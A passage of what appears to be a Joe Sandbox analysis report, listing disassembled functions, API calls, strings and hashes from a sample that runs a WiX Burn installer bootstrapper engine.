                                                            • Opcode Fuzzy Hash: 93f750e0101d6c85013b773761c47c1629070fbd433b52ffba292175f35606de
                                                            • Instruction Fuzzy Hash: 3A910737985A37ABDF3536A94D4EF2A2960FB00B24F154324BE24FA6C0D775DC409AD2
                                                            Function 00874D39 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 220COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 964 874d39-874d81 call 89f8e0 call 8733c7 969 874d95-874d9f call 8898f7 964->969 970 874d83-874d90 call 8b0237 964->970 976 874da1-874da6 969->976 977 874da8-874db7 call 8898fd 969->977 975 874f31-874f3b 970->975 978 874f46-874f4a 975->978 979 874f3d-874f42 CloseHandle 975->979 980 874ddd-874df8 call 871f13 976->980 985 874dbc-874dc0 977->985 983 874f55-874f59 978->983 984 874f4c-874f51 CloseHandle 978->984 979->978 993 874e01-874e15 call 886a57 980->993 994 874dfa-874dff 980->994 987 874f64-874f66 983->987 988 874f5b-874f60 CloseHandle 983->988 984->983 989 874dd7-874dda 985->989 990 874dc2 985->990 991 874f6b-874f7f call 872782 * 2 987->991 992 874f68-874f69 CloseHandle 987->992 988->987 989->980 995 874dc7-874dd2 call 8b0237 990->995 1009 874f81-874f84 call 8b5636 991->1009 1010 874f89-874f8d 991->1010 992->991 1003 874e17 993->1003 1004 874e2f-874e43 call 886b13 993->1004 994->995 995->975 1007 874e1c 1003->1007 1012 874e45-874e4a 1004->1012 1013 874e4c-874e67 call 871f55 1004->1013 1011 874e21-874e2a call 8b0237 1007->1011 1009->1010 1015 874f97-874f9f 1010->1015 1016 874f8f-874f92 call 8b5636 1010->1016 1022 874f2e 1011->1022 1012->1007 1023 874e73-874e8c call 871f55 1013->1023 1024 874e69-874e6e 1013->1024 1016->1015 1022->975 1027 874e8e-874e93 1023->1027 1028 874e98-874ec4 CreateProcessW 1023->1028 1024->995 1027->995 1029 874ec6-874ed0 GetLastError 1028->1029 1030 874f01-874f17 call 8b0a28 1028->1030 1032 874ed2-874edb 1029->1032 1033 874edd 1029->1033 1034 874f1c-874f20 1030->1034 1032->1033 1035 874ee4-874efc call 873821 1033->1035 1036 874edf 1033->1036 1034->975 1038 874f22-874f29 call 8b0237 1034->1038 1035->1011 1036->1035 1038->1022
                                                            APIs
                                                              • Part of subcall function 008733C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F40
                                                            • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F4F
                                                            • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F5E
                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00874F69
                                                            Strings
                                                            • D, xrefs: 00874EA9
                                                            • burn.filehandle.attached, xrefs: 00874E17
                                                            • Failed to append original command line., xrefs: 00874E69
                                                            • Failed to launch clean room process: %ls, xrefs: 00874EF7
                                                            • burn.clean.room, xrefs: 00874DDE
                                                            • Failed to get path for current process., xrefs: 00874D83
                                                            • Failed to wait for clean room process: %ls, xrefs: 00874F23
                                                            • engine.cpp, xrefs: 00874EEA
                                                            • Failed to allocate full command-line., xrefs: 00874E8E
                                                            • burn.filehandle.self, xrefs: 00874E45
                                                            • Failed to cache to clean room., xrefs: 00874DC2
                                                            • -%ls="%ls", xrefs: 00874DE6
                                                            • Failed to append %ls, xrefs: 00874E1C
                                                            • %ls %ls, xrefs: 00874E55
                                                            • "%ls" %ls, xrefs: 00874E7A
                                                            • Failed to allocate parameters for unelevated process., xrefs: 00874DFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$FileModuleName
                                                            • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                            • API String ID: 3884789274-2391192076
                                                            • Opcode ID: 2c3020a41e24c4383b5770c0151e64c6ac7ec84346d838e413e1c509721f5985
                                                            • Instruction ID: 3ffffe827acbb8e7d062af8ffe6d4b38038019f41864070aea7c4548e0ded37d
                                                            • Opcode Fuzzy Hash: 2c3020a41e24c4383b5770c0151e64c6ac7ec84346d838e413e1c509721f5985
                                                            • Instruction Fuzzy Hash: CF717532D40629ABCF219A98CC45EEFBB78FF04720F109255F928F6255DB74DA418B91
                                                            Function 0088752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1041 88752a-88756f call 89f8e0 call 87762c 1046 88757b-88758c call 87c407 1041->1046 1047 887571-887576 1041->1047 1052 887598-8875a9 call 87c26e 1046->1052 1053 88758e-887593 1046->1053 1049 887814-88781b call 8b0237 1047->1049 1056 88781c-887821 1049->1056 1063 8875ab-8875b0 1052->1063 1064 8875b5-8875ca call 87c4c8 1052->1064 1053->1049 1057 887829-88782d 1056->1057 1058 887823-887824 call 8b5636 1056->1058 1061 88782f-887832 call 8b5636 1057->1061 1062 887837-88783c 1057->1062 1058->1057 1061->1062 1066 88783e-88783f call 8b5636 1062->1066 1067 887844-887851 call 87c1bb 1062->1067 1063->1049 1073 8875cc-8875d1 1064->1073 1074 8875d6-8875e6 call 89c001 1064->1074 1066->1067 1075 88785b-88785f 1067->1075 1076 887853-887856 call 8b5636 1067->1076 1073->1049 1084 8875e8-8875ed 1074->1084 1085 8875f2-887665 call 885c33 1074->1085 1080 887869-88786d 1075->1080 1081 887861-887864 call 8b5636 1075->1081 1076->1075 1082 88786f-887872 call 873a16 1080->1082 1083 887877-88787f 1080->1083 1081->1080 1082->1083 1084->1049 1090 887671-887676 1085->1090 1091 887667-88766c 1085->1091 1092 887678 1090->1092 1093 88767d-887698 call 875602 GetCurrentProcess call 8b0879 1090->1093 1091->1049 1092->1093 1097 88769d-8876b4 call 87827b 1093->1097 1100 8876ce-8876e5 call 87827b 1097->1100 1101 8876b6 1097->1101 1106 8876ee-8876f3 1100->1106 1107 8876e7-8876ec 1100->1107 1103 8876bb-8876c9 call 8b0237 1101->1103 1103->1056 1109 88774f-887754 1106->1109 1110 8876f5-887707 call 87821f 1106->1110 1107->1103 1111 887774-88777d 1109->1111 1112 887756-887768 call 87821f 1109->1112 1120 887709-88770e 1110->1120 1121 887713-887723 call 873436 1110->1121 1115 887789-88779d call 88a50c 1111->1115 1116 88777f-887782 1111->1116 1112->1111 1123 88776a-88776f 1112->1123 1128 88779f-8877a4 1115->1128 1129 8877a6 1115->1129 1116->1115 1119 887784-887787 1116->1119 1119->1115 1124 8877ac-8877af 1119->1124 1120->1049 1133 88772f-887743 call 87821f 1121->1133 1134 887725-88772a 1121->1134 1123->1049 1130 8877b1-8877b4 1124->1130 1131 8877b6-8877cc call 87d5a0 1124->1131 1128->1049 1129->1124 1130->1056 1130->1131 1137 8877ce-8877d3 1131->1137 1138 8877d5-8877ed call 87cbc5 1131->1138 1133->1109 1140 887745-88774a 1133->1140 1134->1049 1137->1049 1143 8877ef-8877f4 1138->1143 1144 8877f6-88780d call 87c8e6 1138->1144 1140->1049 1143->1049 1144->1056 1147 88780f 1144->1147 1147->1049
                                                            Strings
                                                            • Failed to parse command line., xrefs: 00887667
                                                            • WixBundleElevated, xrefs: 008876A5, 008876B6
                                                            • Failed to load catalog files., xrefs: 0088780F
                                                            • Failed to initialize variables., xrefs: 00887571
                                                            • Failed to get manifest stream from container., xrefs: 008875CC
                                                            • Failed to load manifest., xrefs: 008875E8
                                                            • Failed to open manifest stream., xrefs: 008875AB
                                                            • Failed to set source process path variable., xrefs: 00887709
                                                            • WixBundleUILevel, xrefs: 008876D6, 008876E7
                                                            • WixBundleOriginalSource, xrefs: 00887759
                                                            • WixBundleSourceProcessPath, xrefs: 008876F8
                                                            • Failed to get source process folder from path., xrefs: 00887725
                                                            • Failed to initialize internal cache functionality., xrefs: 0088779F
                                                            • WixBundleSourceProcessFolder, xrefs: 00887734
                                                            • Failed to open attached UX container., xrefs: 0088758E
                                                            • Failed to set original source variable., xrefs: 0088776A
                                                            • Failed to overwrite the %ls built-in variable., xrefs: 008876BB
                                                            • Failed to get unique temporary folder for bootstrapper application., xrefs: 008877CE
                                                            • Failed to extract bootstrapper application payloads., xrefs: 008877EF
                                                            • Failed to set source process folder variable., xrefs: 00887745
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                            • API String ID: 32694325-1564579409
                                                            • Opcode ID: f1d4913265d492f05e03a77d85586bf8d4c921ba9c31b6637ded02afaf88c16b
                                                            • Instruction ID: 9279115c5528e15a30329add5f3f62e54859d71254d62467d7f10c0c70b6cc17
                                                            • Opcode Fuzzy Hash: f1d4913265d492f05e03a77d85586bf8d4c921ba9c31b6637ded02afaf88c16b
                                                            • Instruction Fuzzy Hash: 46A1A372E4461ABADB12AAA4CC85FEEB77CFB14700F204226F615E7241D734E944CBA5
                                                            Function 008886D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1253 8886d0-88871e CreateFileW 1254 888720-88872a GetLastError 1253->1254 1255 888764-888774 call 8b490d 1253->1255 1257 88872c-888735 1254->1257 1258 888737 1254->1258 1263 88878c-888797 call 8b3edd 1255->1263 1264 888776-888787 call 8b0237 1255->1264 1257->1258 1260 888739 1258->1260 1261 88873e-88875f call 873821 call 8b0237 1258->1261 1260->1261 1276 888908-88891a call 89e06f 1261->1276 1270 88879c-8887a0 1263->1270 1272 888901-888902 CloseHandle 1264->1272 1273 8887bb-8887c0 1270->1273 1274 8887a2-8887b6 call 8b0237 1270->1274 1272->1276 1273->1272 1275 8887c6-8887d5 SetFilePointerEx 1273->1275 1274->1272 1278 88880f-88881f call 8b4e3a 1275->1278 1279 8887d7-8887e1 GetLastError 1275->1279 1290 88882b-88883c SetFilePointerEx 1278->1290 1291 888821-888826 1278->1291 1282 8887ee 1279->1282 1283 8887e3-8887ec 1279->1283 1286 8887f0 1282->1286 1287 8887f5-88880a call 873821 1282->1287 1283->1282 1286->1287 1293 8888f9-888900 call 8b0237 1287->1293 1294 88883e-888848 GetLastError 1290->1294 1295 888876-888886 call 8b4e3a 1290->1295 1291->1293 1293->1272 1298 88884a-888853 1294->1298 1299 888855 1294->1299 1295->1291 1305 888888-888898 call 8b4e3a 1295->1305 1298->1299 1300 88885c-888871 call 873821 1299->1300 1301 888857 1299->1301 1300->1293 1301->1300 1305->1291 1309 88889a-8888ab SetFilePointerEx 1305->1309 1310 8888ad-8888b7 GetLastError 1309->1310 1311 8888e2-8888f2 call 8b4e3a 1309->1311 1313 8888b9-8888c2 1310->1313 1314 8888c4 1310->1314 1311->1272 1319 8888f4 1311->1319 1313->1314 1316 8888cb-8888e0 call 873821 1314->1316 1317 8888c6 1314->1317 1316->1293 1317->1316 1319->1293
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00874DBC,?,?,00000000,00874DBC,00000000), ref: 00888713
                                                            • GetLastError.KERNEL32 ref: 00888720
                                                              • Part of subcall function 008B3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008B3F73
                                                            • SetFilePointerEx.KERNEL32(00000000,008BB4B8,00000000,00000000,00000000,?,00000000,008BB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008887CD
                                                            • GetLastError.KERNEL32 ref: 008887D7
                                                            • CloseHandle.KERNELBASE(00000000,?,00000000,008BB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00888902
                                                            Strings
                                                            • cache.cpp, xrefs: 00888744, 008887FB, 00888862, 008888D1
                                                            • Failed to create engine file at path: %ls, xrefs: 00888751
                                                            • cabinet.dll, xrefs: 0088887B
                                                            • Failed to update signature offset., xrefs: 00888821
                                                            • Failed to seek to signature table in exe header., xrefs: 0088886C
                                                            • msi.dll, xrefs: 00888814
                                                            • Failed to seek to checksum in exe header., xrefs: 00888805
                                                            • Failed to zero out original data offset., xrefs: 008888F4
                                                            • Failed to seek to original data in exe burn section header., xrefs: 008888DB
                                                            • Failed to seek to beginning of engine file: %ls, xrefs: 00888779
                                                            • Failed to copy engine from: %ls to: %ls, xrefs: 008887A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                            • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                            • API String ID: 3456208997-1976062716
                                                            • Opcode ID: fa8f9b225552fc198a73a05c7c2ca1e9d0908a1c7a5faeabef1cd98b6419076f
                                                            • Instruction ID: 67495af3bbbb14794c64ca62e03e2684542e5cc757c0439347e9957862e6f04f
                                                            • Opcode Fuzzy Hash: fa8f9b225552fc198a73a05c7c2ca1e9d0908a1c7a5faeabef1cd98b6419076f
                                                            • Instruction Fuzzy Hash: F6515372A41626EAD7127A548C46FBF7A68FF04B10F514239FE10FB281EB64DC0197E6
                                                            Function 0087762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1321 87762c-877edf InitializeCriticalSection 1322 877ee2-877f06 call 875623 1321->1322 1325 877f13-877f24 call 8b0237 1322->1325 1326 877f08-877f0f 1322->1326 1329 877f27-877f39 call 89e06f 1325->1329 1326->1322 1327 877f11 1326->1327 1327->1329
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(0088756B,008753BD,00000000,00875445), ref: 0087764C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalInitializeSection
                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                            • API String ID: 32694325-3635313340
                                                            • Opcode ID: cc88731a415eb16392594ffc75a9d9eeeb015f2671e19581ad68de301e060850
                                                            • Instruction ID: 542208424d819c6a665722b0dfeb0de75939ef840d44529b5c59ced28da24846
                                                            • Opcode Fuzzy Hash: cc88731a415eb16392594ffc75a9d9eeeb015f2671e19581ad68de301e060850
                                                            • Instruction Fuzzy Hash: 823247B0C116299BDB65CF9AC9887CDFAB4FB49304F9081EED24CA6311D7B05B888F55
                                                            Function 008882BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1333 8882ba-888303 call 89f8e0 1336 888309-888317 GetCurrentProcess call 8b0879 1333->1336 1337 88847c-888489 call 872195 1333->1337 1341 88831c-888329 1336->1341 1342 888498-8884aa call 89e06f 1337->1342 1343 88848b 1337->1343 1344 88832f-88833e GetWindowsDirectoryW 1341->1344 1345 8883b7-8883c5 GetTempPathW 1341->1345 1346 888490-888497 call 8b0237 1343->1346 1348 888378-888389 call 87337f 1344->1348 1349 888340-88834a GetLastError 1344->1349 1350 8883ff-888411 UuidCreate 1345->1350 1351 8883c7-8883d1 GetLastError 1345->1351 1346->1342 1371 88838b-888390 1348->1371 1372 888395-8883ab call 8736a3 1348->1372 1357 88834c-888355 1349->1357 1358 888357 1349->1358 1354 88841a-88842f StringFromGUID2 1350->1354 1355 888413-888418 1350->1355 1359 8883de 1351->1359 1360 8883d3-8883dc 1351->1360 1363 88844d-88846e call 871f13 1354->1363 1364 888431-88844b call 873821 1354->1364 1355->1346 1357->1358 1365 888359 1358->1365 1366 88835e-888373 call 873821 1358->1366 1367 8883e0 1359->1367 1368 8883e5-8883fa call 873821 1359->1368 1360->1359 1381 888470-888475 1363->1381 1382 888477 1363->1382 1364->1346 1365->1366 1366->1346 1367->1368 1368->1346 1371->1346 1372->1350 1383 8883ad-8883b2 1372->1383 1381->1346 1382->1337 1383->1346
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00875489), ref: 00888310
                                                              • Part of subcall function 008B0879: OpenProcessToken.ADVAPI32(?,00000008,?,008753BD,00000000,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B0897
                                                              • Part of subcall function 008B0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08A1
                                                              • Part of subcall function 008B0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B092B
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00888336
                                                            • GetLastError.KERNEL32 ref: 00888340
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 008883BD
                                                            • GetLastError.KERNEL32 ref: 008883C7
                                                            • UuidCreate.RPCRT4(?), ref: 00888406
                                                            Strings
                                                            • cache.cpp, xrefs: 00888364, 008883EB, 0088843C
                                                            • Failed to convert working folder guid into string., xrefs: 00888446
                                                            • Failed to concat Temp directory on windows path for working folder., xrefs: 008883AD
                                                            • Failed to create working folder guid., xrefs: 00888413
                                                            • Failed to get temp path for working folder., xrefs: 008883F5
                                                            • Failed to copy working folder path., xrefs: 0088848B
                                                            • Failed to get windows path for working folder., xrefs: 0088836E
                                                            • Failed to ensure windows path for working folder ended in backslash., xrefs: 0088838B
                                                            • Temp\, xrefs: 00888395
                                                            • Failed to append bundle id on to temp path for working folder., xrefs: 00888470
                                                            • %ls%ls\, xrefs: 00888458
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                            • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                            • API String ID: 266130487-819636856
                                                            • Opcode ID: 87ccef35836d875d2761a2a63cff8565485125654ebed42190fa7f716ab3f3f5
                                                            • Instruction ID: 6f33f10273790de382e486d0a16bcfc4f0a2617b104110184d079a979a7f88f0
                                                            • Opcode Fuzzy Hash: 87ccef35836d875d2761a2a63cff8565485125654ebed42190fa7f716ab3f3f5
                                                            • Instruction Fuzzy Hash: AC41B473A4172AE7D730A6A48C49F9A73A8FB04B10F504265BA08F7341EA78DD0447E6
                                                            Function 008910FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1384 8910fb-891127 CoInitializeEx 1385 891129-891136 call 8b0237 1384->1385 1386 89113b-891186 call 8af483 1384->1386 1393 89139e-8913b0 call 89e06f 1385->1393 1391 891188-8911ab call 873821 call 8b0237 1386->1391 1392 8911b0-8911d2 call 8af4a4 1386->1392 1412 891397-891398 CoUninitialize 1391->1412 1401 8911d8-8911e0 1392->1401 1402 89128c-891297 SetEvent 1392->1402 1406 89138f-891392 call 8af4b4 1401->1406 1407 8911e6-8911ec 1401->1407 1403 891299-8912a3 GetLastError 1402->1403 1404 8912d6-8912e4 WaitForSingleObject 1402->1404 1410 8912b0 1403->1410 1411 8912a5-8912ae 1403->1411 1408 891318-891323 ResetEvent 1404->1408 1409 8912e6-8912f0 GetLastError 1404->1409 1406->1412 1407->1406 1414 8911f2-8911fa 1407->1414 1417 89135a-891360 1408->1417 1418 891325-89132f GetLastError 1408->1418 1415 8912fd 1409->1415 1416 8912f2-8912fb 1409->1416 1419 8912b2 1410->1419 1420 8912b4-8912c4 call 873821 1410->1420 1411->1410 1412->1393 1421 8911fc-8911fe 1414->1421 1422 891274-891287 call 8b0237 1414->1422 1426 8912ff 1415->1426 1427 891301-891316 call 873821 1415->1427 1416->1415 1423 89138a 1417->1423 1424 891362-891365 1417->1424 1428 89133c 1418->1428 1429 891331-89133a 1418->1429 1419->1420 1459 8912c9-8912d1 call 8b0237 1420->1459 1431 891211-891214 1421->1431 1432 891200 1421->1432 1422->1406 1423->1406 1433 891367-891381 call 873821 1424->1433 1434 891386-891388 1424->1434 1426->1427 1427->1459 1439 89133e 1428->1439 1440 891340-891355 call 873821 1428->1440 1429->1428 1435 89126e 1431->1435 1436 891216 1431->1436 1442 891202-891204 1432->1442 1443 891206-89120f 1432->1443 1433->1459 1434->1406 1444 891270-891272 1435->1444 1446 891239-89123e 1436->1446 1447 89122b-891230 1436->1447 1448 89126a-89126c 1436->1448 1449 89121d-891222 1436->1449 1450 89125c-891261 1436->1450 1451 89124e-891253 1436->1451 1452 891240-891245 1436->1452 1453 891263-891268 1436->1453 1454 891232-891237 1436->1454 1455 891255-89125a 1436->1455 1456 891224-891229 1436->1456 1457 891247-89124c 1436->1457 1439->1440 1440->1459 1442->1444 1443->1444 1444->1402 1444->1422 1446->1422 1447->1422 1448->1422 1449->1422 1450->1422 1451->1422 1452->1422 1453->1422 1454->1422 1455->1422 1456->1422 1457->1422 1459->1406
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0089111D
                                                            • CoUninitialize.COMBASE ref: 00891398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 3442037557-1168358783
                                                            • Opcode ID: 8cecb2e3401c4f6e734811ba80bef9dfc10276c5fad0f24c8b345f7c3067e37e
                                                            • Instruction ID: a753149498950b44addb0e9661c765370ebe405bc665e62def1c8f4b68ab57b7
                                                            • Opcode Fuzzy Hash: 8cecb2e3401c4f6e734811ba80bef9dfc10276c5fad0f24c8b345f7c3067e37e
                                                            • Instruction Fuzzy Hash: E3513A36A88167EB8F21B7D44C0DE6F3674FB41720B2E4369BD21FB790D6689C0096D6
                                                            Function 008742D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1465 8742d7-87432e InitializeCriticalSection * 2 call 884d05 * 2 1470 874334 1465->1470 1471 874452-87445c call 87b48b 1465->1471 1472 87433a-874347 1470->1472 1476 874461-874465 1471->1476 1474 874445-87444c 1472->1474 1475 87434d-874379 lstrlenW * 2 CompareStringW 1472->1475 1474->1471 1474->1472 1477 8743cb-8743f7 lstrlenW * 2 CompareStringW 1475->1477 1478 87437b-87439e lstrlenW 1475->1478 1479 874467-874473 call 8b0237 1476->1479 1480 874474-87447c 1476->1480 1477->1474 1484 8743f9-87441c lstrlenW 1477->1484 1481 8743a4-8743a9 1478->1481 1482 87448a-87449f call 873821 1478->1482 1479->1480 1481->1482 1485 8743af-8743bf call 8729ce 1481->1485 1496 8744a4-8744ab 1482->1496 1488 8744b6-8744d0 call 873821 1484->1488 1489 874422-874427 1484->1489 1498 8743c5 1485->1498 1499 87447f-874488 1485->1499 1488->1496 1489->1488 1493 87442d-87443d call 8729ce 1489->1493 1493->1499 1503 87443f 1493->1503 1500 8744ac-8744b4 call 8b0237 1496->1500 1498->1477 1499->1500 1500->1480 1503->1474
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00875266,?,?,00000000,?,?), ref: 00874303
                                                            • InitializeCriticalSection.KERNEL32(000000D0,?,?,00875266,?,?,00000000,?,?), ref: 0087430C
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00875266,?,?,00000000,?,?), ref: 00874352
                                                            • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00875266,?,?,00000000,?,?), ref: 0087435C
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00875266,?,?,00000000,?,?), ref: 00874370
